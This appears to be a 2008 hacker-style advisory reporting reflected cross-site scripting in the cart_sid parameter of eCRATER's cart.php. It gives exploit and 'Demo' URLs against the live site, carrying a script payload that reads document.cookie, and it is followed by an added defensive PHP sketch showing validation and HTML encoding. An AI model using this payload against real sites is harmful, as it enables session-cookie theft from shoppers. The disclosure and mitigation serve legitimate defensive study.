eCRATER suffers from a reflected cross-site scripting (XSS) vulnerability in the cart_sid parameter of cart.php.
[~]----------------------------------------------------------------
[~] eCRATER [cart.php] -XSS- [Cross Site Scripting Vulnerabilities]
[~]
[~] http://www.ecrater.com
[~] ----------------------------------------------------------
[~] Bug found by d3v1l
[~]
[~] Date:02.10.2008
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com )
[~]
[~] Pentest| Gibon| Pig
[~]-------------------------------------------------------------
[~]
[~]
[~] Exploit:- http://www.site.com/cart.php?cart_sid="<script>alert(document.cookie)</script>
[~]
[~] Demo:- http://www.ecrater.com/cart.php?cart_sid="<script>alert(document.cookie)</script>
[~]
[~] About:-
[~]
[~]eCRATER.com is both a free web store builder and a free online marketplace.
[~]Sellers can easily create their own free online store in minutes.
[~]Buyers can easily browse and compare between thousands of products.
[~]Sellers receive free website hosting, a free subdomain and a powerful admin tool to manage their free online stores.
[~]All products are posted to Google Product Search as well.
[~]---------------------------------------------------------------------------------------------------------------------
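
Mitigation sketch for the cart_sid reflection reported above. This is an added example, not eCRATER's code and not part of the original advisory. It assumes the value is echoed into a double-quoted HTML attribute (suggested by the leading `"` in the payload) and that a valid cart session id is 16 to 64 alphanumeric characters; the function names, the hidden input field and the id format are hypothetical.

```php
<?php
// Added example: hypothetical handling of cart_sid, not eCRATER's actual code.

// Assumed id format (not from the advisory): 16-64 characters of [A-Za-z0-9].
const CART_SID_PATTERN = '/\A[A-Za-z0-9]{16,64}\z/';

// Allow-list validation: return the id only if it matches the expected shape.
function clean_cart_sid($raw): ?string
{
    // Non-string input (e.g. cart_sid[]=x) and malformed values are rejected.
    if (!is_string($raw) || preg_match(CART_SID_PATTERN, $raw) !== 1) {
        return null;
    }
    return $raw;
}

// Output encoding for an HTML attribute value.
function attr(string $value): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render the (hypothetical) hidden field that carries the cart session id.
function render_cart_field($raw): string
{
    $sid = clean_cart_sid($raw);
    if ($sid === null) {
        // Invalid id: emit an empty value instead of reflecting the input.
        return '<input type="hidden" name="cart_sid" value="">';
    }
    // Encode even validated values, in case the pattern is loosened later.
    return '<input type="hidden" name="cart_sid" value="' . attr($sid) . '">';
}

// Constructed inputs: the advisory's payload and a well-formed id.
$samples = [
    '"<script>alert(document.cookie)</script>',
    'a1B2c3D4e5F6g7H8',
];
foreach ($samples as $s) {
    echo render_cart_field($s), PHP_EOL;
}

// Encoding alone, for contexts where the value must be shown as received.
echo attr($samples[0]), PHP_EOL;
```

Setting the HttpOnly flag on the session cookie additionally keeps `document.cookie` from exposing it if an encoding step is missed elsewhere.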